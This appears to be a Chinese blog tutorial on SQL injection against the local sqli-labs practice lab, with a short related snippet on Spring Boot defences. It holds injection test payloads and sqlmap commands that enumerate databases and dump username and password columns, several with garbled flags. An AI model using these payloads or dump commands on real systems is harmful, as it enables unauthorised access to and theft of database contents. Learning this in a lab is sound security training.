SQL注入(二)

(一)SQL注入点的详细判断:
1、单引号判断
http://localhost/sqli/Less-1/?id=1’ 如果出现错误提示,则该网站可能就存在注入漏洞
2、and判断
http://localhost/sqli/Less-1/?id=1’ and 1=1–+ 这个条件永远都是真的,所以返回是正常页
http://localhost/sqli/Less-1/?id=1’ and 1=2–+ 如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。
3、OR判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)
http://localhost/sqli/Less-1/?id=1’ or 1=1–+
http://localhost/sqli/Less-1/?id=1’ or 1=2–+
当着两个语句都是返回正确,这就是证明有注入点。
or和and的区别:高中应该都讲过,在这里简单说一下。or指的是两个条件中只要有一个正确即可表现为真,当两个条件都为真(假)时,总体为真(假),and所表现的是并列关系,两个条件同时为真时,总体才为真,当其中一个条件为假时,那么总体表现为假。
(二)掌握sqlmap的基本使用

判断是否存在注入: python sqlmap.py -u “url”
获取全部数据库: python sqlmap.py -U URL --dbs
获取当前数据库: python sqlmap.py -u URL --current-db
获取当 前数据库里所有表: python sqlmap.py -u URL -D DB–tables
获取表的字段: python sqlmap.py -u URL -D DB-T users - -columns
爆值: python sqlmap.py -u URL -D DB-T users -C “password, username” --dump

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Spring Boot 是基于 Spring 框架构建的,它可以通过自动配置和约定大于配置的方式来轻松创建独立的、生产级别的 Spring 应用程序。然而,Spring Boot 也存在 SQL 注入的风险,因此我们需要掌握相应的防范措施。 SQL 注入漏洞是指黑客利用合法的 SQL 查询接口,向应用程序的后台数据库发送针对数据库的攻击字符串,获取数据库的机密信息或通过修改数据库来破坏系统的安全性。在 Spring Boot 中,SQL 注入漏洞通常出现在动态拼接 SQL 语句的场景中,如使用 JdbcTemplate 进行数据库操作或通过 MyBatis 操作数据库时,如果不做正确的防范,就很容易发生 SQL 注入漏洞。 为了避免 SQL 注入漏洞的问题,我们可以采取以下措施: 1. 使用预处理语句:建议使用预处理语句,这样可以将传入的参数当做参数来处理,而不是当做 SQL 语句的一部分来处理。预处理语句可以有效地解决 SQL 注入问题,也可以提高应用程序的性能。 2. 使用参数中转:使用参数中转可以将直接拼接 SQL 语句的方式改为将参数值插入到预定义的 SQL 语句当中,从而避免 SQL 注入漏洞的风险。 3. 遵循安全编码规范:在进行开发工作时,应该遵循安全编码规范,对输入参数进行合理的检查和过滤,确保不会将恶意的输入传递给后台 SQL 语句。 总而言之,为了防范 SQL 注入漏洞,我们需要采取多种措施,如使用预处理语句、使用参数中转和遵循安全编码规范等,以确保应用程序的安全性。同时,开发人员也要不断学习新的安全技术和解决方案,提高系统的安全性和鲁棒性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Stray.io

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值